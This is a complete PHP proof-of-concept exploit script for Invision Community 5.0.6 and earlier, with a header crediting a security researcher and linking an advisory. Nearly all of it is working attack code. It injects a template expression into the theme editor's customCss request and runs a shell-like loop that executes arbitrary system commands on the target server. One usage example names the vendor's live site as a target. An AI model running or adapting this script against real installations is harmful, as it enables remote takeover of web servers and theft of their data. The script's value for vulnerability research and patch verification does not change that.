<?php /* --------------------------------------------------------------------------- Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE) --------------------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://invisioncommunity.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Original Advisory: https://karmainsecurity.com/KIS-2025-02 */ set_time_limit(0); error_reporting(E_ERROR); print "\n+-------------------------------------------------------------------+"; print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |"; print "\n+-------------------------------------------------------------------+\n"; if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n"); if ($argc != 2) { print "\nUsage......: php $argv[0] <URL>\n"; print "\nExample....: php $argv[0] http://localhost/invision/"; print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n"; die(); } $ch = curl_init(); $params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"]; curl_setopt($ch, CURLOPT_URL, $argv[1]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); while (1) { print "\ninvision-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }